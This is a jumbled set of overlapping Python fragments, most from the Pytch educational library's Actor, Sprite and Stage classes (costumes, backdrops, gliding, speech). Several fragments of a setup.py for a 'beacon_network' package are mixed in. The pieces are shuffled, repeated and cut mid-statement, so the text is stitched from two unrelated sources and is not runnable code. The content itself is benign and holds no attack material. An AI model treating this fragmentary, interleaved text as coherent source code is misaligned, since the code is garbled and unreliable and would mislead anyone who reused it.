switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name =", "at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if self.start_shown and not at_least_one_Costume:", ">= n_appearances: raise ValueError( ('could not switch to {} number {} in class", "/ n_frames # t is in (0.0, 1.0] t_c = 1.0 - t", "(self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def", "it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else:", "size def show(self): if not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot", "cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if", "involve some movement, so count from 1 up # to n_frames (inclusive) rather", "self._shown = self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else:", "= 0 self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0", "It is not necessarily an error to have no Costumes, as # long", "say(self, content): self._speech = (\"say\", content) def say_nothing(self): self._speech = None def say_for_seconds(self,", "want # the first frame to involve some movement, so count from 1", "self._appearance_index += n_steps self._appearance_index %= len(self._Appearances) @property def appearance_number(self): return self._appearance_index @property def", "argument must be string or integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not", "_size = 1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop' def", "KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index =", "RuntimeError('cannot show a Sprite with no Costumes') self._shown = True def hide(self): self._shown", "= 0 self._y = 0 self._size = 1.0 self._speech = None at_least_one_Costume =", "not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a Sprite with", "dx): self._x += dx def get_y(self): return self._y def set_y(self, y): self._y =", "def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None:", "not self.Backdrops: # In contrast to Sprites, a Stage is always shown and", "def switch_backdrop(self, backdrop_name): self.switch_appearance(backdrop_name) def next_backdrop(self, n_steps=1): self.next_appearance(n_steps) @property def backdrop_number(self): return self.appearance_number", "from pytch.syscalls import ( play_sound, registered_instances, wait_seconds, ) from pytch.project import FRAMES_PER_SECOND def", "_is_number(x): return isinstance(x, int) or isinstance(x, float) class Actor: Sounds = [] _appearance_names", "+ t_c * start_x y = t * destination_y + t_c * start_y", "registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x = x", "16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y =", "def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name, True) @classmethod", "def costume_number(self): return self.appearance_number @property def costume_name(self): return self.appearance_name def touching(self, target_class): return", "'Backdrop' def __init__(self): if not self.Backdrops: # In contrast to Sprites, a Stage", "appearance_name not in self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"'", "def say(self, content): self._speech = (\"say\", content) def say_nothing(self): self._speech = None def", "= frame_idx / n_frames # t is in (0.0, 1.0] t_c = 1.0", "not move to next {} in class \"{}\":' ' it has no {0}s')", "# the first frame to involve some movement, so count from 1 up", "raise ValueError( ('could not move to next {} in class \"{}\":' ' it", "self._size = size def show(self): if not self.Costumes: # See comment in __init__().", "seconds < 0: raise ValueError(\"'seconds' cannot be negative\") n_frames = max(int(seconds * FRAMES_PER_SECOND),", "appearance_index, self.__class__.__name__, n_appearances)) self._appearance_index = appearance_index else: raise ValueError( ('could not switch {}", "destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number:", "Costumes') self._shown = True def hide(self): self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name)", "coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a number\");", "return self._x def set_x(self, x): self._x = x def change_x(self, dx): self._x +=", "integer') .format(self._appearance_hyponym, self.__class__.__name__)) def next_appearance(self, n_steps): if not isinstance(n_steps, int): raise ValueError(\"n_steps must", "in (0.0, 1.0] t_c = 1.0 - t # 'complement' x = t", "1) start_x = self._x start_y = self._y # On completion, we must be", "class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index =", "= [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x", "might, for # example, only receive/broadcast messages or play sounds. self._appearance_index = None", "frame_idx in range(1, n_frames + 1): t = frame_idx / n_frames # t", "as the Sprite always remains hidden. It might, for # example, only receive/broadcast", "registered_instances(cls) def go_to_xy(self, x, y): self._x = x self._y = y def get_x(self):", "ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0] def", "self.start_shown else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It", "number can not be negative') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__)) n_appearances = len(self._appearance_names) if appearance_index", "ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances", "= appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find {} \"{}\"", "('could not switch to {} number {} in class \"{}\":' ' number can", "= x self._y = y def get_x(self): return self._x def set_x(self, x): self._x", "t * destination_x + t_c * start_x y = t * destination_y +", "not switch to {} number {} in class \"{}\":' ' it only has", "ValueError( ('could not move to next {} in class \"{}\":' ' it has", "= False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self):", "{} number {} in class \"{}\":' ' number can not be negative') .format(self._appearance_hyponym,", "def say_nothing(self): self._speech = None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class", "get_y(self): return self._y def set_y(self, y): self._y = y def change_y(self, dy): self._y", "raise ValueError( ('could not switch to {} number {} in class \"{}\":' '", "switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property", "and we want # the first frame to involve some movement, so count", "wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y =", "up to n_frames - 1. for frame_idx in range(1, n_frames + 1): t", "first frame to involve some movement, so count from 1 up # to", "n_frames = max(int(seconds * FRAMES_PER_SECOND), 1) start_x = self._x start_y = self._y #", "Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym = 'Costume' def", "\"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__)) self._appearance_index = self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int):", "size): self._size = size def show(self): if not self.Costumes: # See comment in", "to n_frames - 1. for frame_idx in range(1, n_frames + 1): t =", "sound_name, True) @classmethod def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label", "= t * destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No", "all_clones(cls): return registered_instances(cls)[1:] @classmethod def all_instances(cls): return registered_instances(cls) def go_to_xy(self, x, y): self._x", "show(self): if not self.Costumes: # See comment in __init__(). raise RuntimeError('cannot show a", "1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"): if", "self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')] _x = 0 _y = 0", "we want # the first frame to involve some movement, so count from", "= None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return registered_instances(cls)[1:] @classmethod", "destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't", "sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod def all_clones(cls): return", "costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def", "get_x(self): return self._x def set_x(self, x): self._x = x def change_x(self, dx): self._x", "self._appearance_index = appearance_index else: raise ValueError( ('could not switch {} in class \"{}\":'", "def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops = [('solid-white', 'solid-white-stage.png')]", "costume_name(self): return self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self)", "len(self._appearance_names) if appearance_index >= n_appearances: raise ValueError( ('could not switch to {} number", "destination_x + t_c * start_x y = t * destination_y + t_c *", "def appearance_number(self): return self._appearance_index @property def appearance_name(self): self.ensure_have_appearance_names() return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes", "(self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self,", "* destination_y + t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we", "def ensure_have_appearance_names(cls): if cls._appearance_names is None: cls._appearance_names = [ appearance.label for appearance in", "raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return registered_instances(cls)[0]", "Backdrop. raise ValueError('no Backdrops in Stage') self._appearance_index = 0 @classmethod def the_only(cls): return", ".move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", -n_layers)) def say(self, content):", "always shown and so # must have at least one Backdrop. raise ValueError('no", "On completion, we must be exactly at the target, and we want #", "= t * destination_x + t_c * start_x y = t * destination_y", "self.appearance_name def touching(self, target_class): return (self._pytch_parent_project .instance_is_touching_any_of(self, target_class)) def delete_this_clone(self): self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self):", "# See comment in __init__(). raise RuntimeError('cannot show a Sprite with no Costumes')", "= x def change_x(self, dx): self._x += dx def get_y(self): return self._y def", "= 0 _y = 0 _size = 1.0 _shown = True _speech =", "seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination", "16), ] _appearance_hyponym = 'Costume' def __init__(self): self._x = 0 self._y = 0", "example, only receive/broadcast messages or play sounds. self._appearance_index = None @classmethod def the_original(cls):", "def set_size(self, size): self._size = size def show(self): if not self.Costumes: # See", "exactly at the target, and we want # the first frame to involve", "return self._appearance_names[self._appearance_index] class Sprite(Actor): Costumes = [ ('question-mark', 'question-mark.png', 16, 16), ] _appearance_hyponym", "self._appearance_names.index(appearance_name) elif isinstance(appearance_name_or_index, int): appearance_index = appearance_name_or_index if appearance_index < 0: raise ValueError(", "a Sprite with no Costumes') self._shown = True def hide(self): self._shown = False", "wait_seconds(0) # No auto-yield (we don't do \"import pytch\") def set_size(self, size): self._size", "def glide_to_xy(self, destination_x, destination_y, seconds): destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if", "\"start_shown\"): if self.start_shown and not at_least_one_Costume: raise ValueError(\"start_shown is set,\" \" but there", "messages or play sounds. self._appearance_index = None @classmethod def the_original(cls): return registered_instances(cls)[0] @classmethod", "ValueError( ('could not switch to {} number {} in class \"{}\":' ' it", "self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise", "t_c * start_y self.go_to_xy(x, y) wait_seconds(0) # No auto-yield (we don't do \"import", "__init__(). raise RuntimeError('cannot show a Sprite with no Costumes') self._shown = True def", "n_frames - 1. for frame_idx in range(1, n_frames + 1): t = frame_idx", "= 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self, \"start_shown\"):", "str): appearance_name = appearance_name_or_index if appearance_name not in self._appearance_names: raise KeyError('could not find", "= [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if", "1.0 _shown = True _speech = None _appearance_hyponym = 'Backdrop' def __init__(self): if", "{} in class \"{}\":' ' it only has {} {0}s') .format(self._appearance_hyponym, appearance_index, self.__class__.__name__,", "destination_is_number = ( _is_number(destination_x) and _is_number(destination_y) ) if not destination_is_number: raise ValueError(\"destination coordinates", "self._appearance_names: raise KeyError('could not find {} \"{}\" in class \"{}\"' .format(self._appearance_hyponym, appearance_name, self.__class__.__name__))", "shown and so # must have at least one Backdrop. raise ValueError('no Backdrops", "for appearance in cls._Appearances ] def switch_appearance(self, appearance_name_or_index): self.ensure_have_appearance_names() if isinstance(appearance_name_or_index, str): appearance_name", "= None def start_sound(self, sound_name): play_sound(self, sound_name, False) def play_sound_until_done(self, sound_name): play_sound(self, sound_name,", ".move_within_draw_layer_group(self, \"absolute\", 0)) def move_forward_layers(self, n_layers): (self._pytch_parent_project .move_within_draw_layer_group(self, \"relative\", n_layers)) def move_backward_layers(self, n_layers):", "else: self._shown = at_least_one_Costume if at_least_one_Costume: self._appearance_index = 0 else: # It is", "self._size = 1.0 self._speech = None at_least_one_Costume = len(self._Appearances) != 0 if hasattr(self,", "integer\") if len(self._Appearances) == 0: raise ValueError( ('could not move to next {}", "_x = 0 _y = 0 _size = 1.0 _shown = True _speech", "the target, and we want # the first frame to involve some movement,", "self._shown = False def switch_costume(self, costume_name): self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def", "isinstance(x, float) class Actor: Sounds = [] _appearance_names = None def start_sound(self, sound_name):", "ValueError(\"destination coordinates must be numbers\") if not _is_number(seconds): raise ValueError(\"'seconds' must be a", "self.switch_appearance(costume_name) def next_costume(self, n_steps=1): self.next_appearance(n_steps) @property def costume_number(self): return self.appearance_number @property def costume_name(self):", "= None def say_for_seconds(self, content, seconds): self.say(content) wait_seconds(seconds) self.say_nothing() class Stage(Actor): Backdrops =", "is None: cls._appearance_names = [ appearance.label for appearance in cls._Appearances ] def switch_appearance(self,", "self._pytch_parent_project.unregister_actor_instance(self) def move_to_front_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", -1)) def move_to_back_layer(self): (self._pytch_parent_project .move_within_draw_layer_group(self, \"absolute\", 0))" ]
[ "Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\",", "classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic ::", "\"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\",", "author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\",", "\"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\",", "\"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status ::", "\"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved ::", "\"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\",", "python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\":", "\"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], },", "WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming", ":: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\",", "\"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={", "import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", },", "<reponame>CSCfi/beacon-network<gh_stars>1-10 from setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={", "\"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\",", "\"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\",", "Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\",", ">= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\",", ":: HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language", "setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC -", "\"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[", "from setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\":", "\"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\",", "\"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0;", "\"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0;", "\"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\",", "\"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >=", "3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ],", "\"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\", \"beacon_aggregator=aggregator.aggregator:main\"],", "Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language :: Python", "\"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]},", "Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved", ":: Apache Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\",", "< '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [", "extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\",", "long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development", "[\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\",", "Software License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\",", ":: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP", ":: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\",", "services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[", "Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache Software", "\"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\",", "Audience :: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License ::", "\"ujson==4.3.0\", \"uvloop==0.14.0; python_version < '3.7'\", \"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ],", "HTTP Servers\", \"License :: OSI Approved :: Apache Software License\", \"Programming Language ::", "\"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\",", "\"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ],", "Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\",", "setuptools import setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\",", "\"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\",", "\"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={", "}, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3 -", "Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\",", "Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\", \"Topic", "setup setup( name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC", "], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\",", "\"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"],", "\"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\", \"flake8==4.0.1\", \"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\",", ":: OSI Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\",", "], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\":", "package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version <", "- IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended", "IT Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience", "\"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\", ], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\",", "'3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\", \"pytest-cov==3.0.0\", \"testfixtures==6.18.3\", \"tox==3.24.4\",", ":: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\", \"registry/config\", \"registry/endpoints\", \"registry/schemas\", \"registry/utils\",", "\"uvloop==0.16.0; python_version >= '3.7'\", \"asyncpg==0.25.0\", \"jsonschema==4.2.1\", \"gunicorn==20.1.0\", ], extras_require={ \"test\": [ \"coverage==6.2\", \"pytest<6.3\",", "\"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\", \"registry\",", ":: Developers\", \"Topic :: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI", "for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience :: Developers\",", "\"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\": [\"beacon_registry=registry.registry:main\",", "License\", \"Programming Language :: Python :: 3.8\", ], packages=[ \"aggregator\", \"aggregator/config\", \"aggregator/endpoints\", \"aggregator/utils\",", "\"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center for Science\", classifiers=[ \"Development Status :: 3", "], package_data={\"\": [\"*.json\", \"*.ini\"]}, install_requires=[ \"asyncio==3.4.3\", \"aiohttp==3.8.1\", \"aiohttp-cors==0.7.0\", \"aiocache==0.11.1\", \"aiomcache==0.6.0\", \"ujson==4.3.0\", \"uvloop==0.14.0; python_version", ":: Internet :: WWW/HTTP :: HTTP Servers\", \"License :: OSI Approved :: Apache", "\"flake8-docstrings==1.6.0\", \"asynctest==0.13.0\", \"aioresponses==0.7.2\", \"black==21.12b0\", ], \"docs\": [\"sphinx >= 1.4\", \"sphinx_rtd_theme==1.0.0\"], }, entry_points={ \"console_scripts\":", "OSI Approved :: Apache Software License\", \"Programming Language :: Python :: 3.8\", ],", "version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ \"Source\": \"https://github.com/CSCfi/beacon-network\", }, author=\"CSC - IT Center", "Center for Science\", classifiers=[ \"Development Status :: 3 - Beta\", \"Intended Audience ::", "name=\"beacon_network\", version=\"1.4.0\", description=\"Beacon Network services\", long_description_content_type=\"text/markdown\", project_urls={ 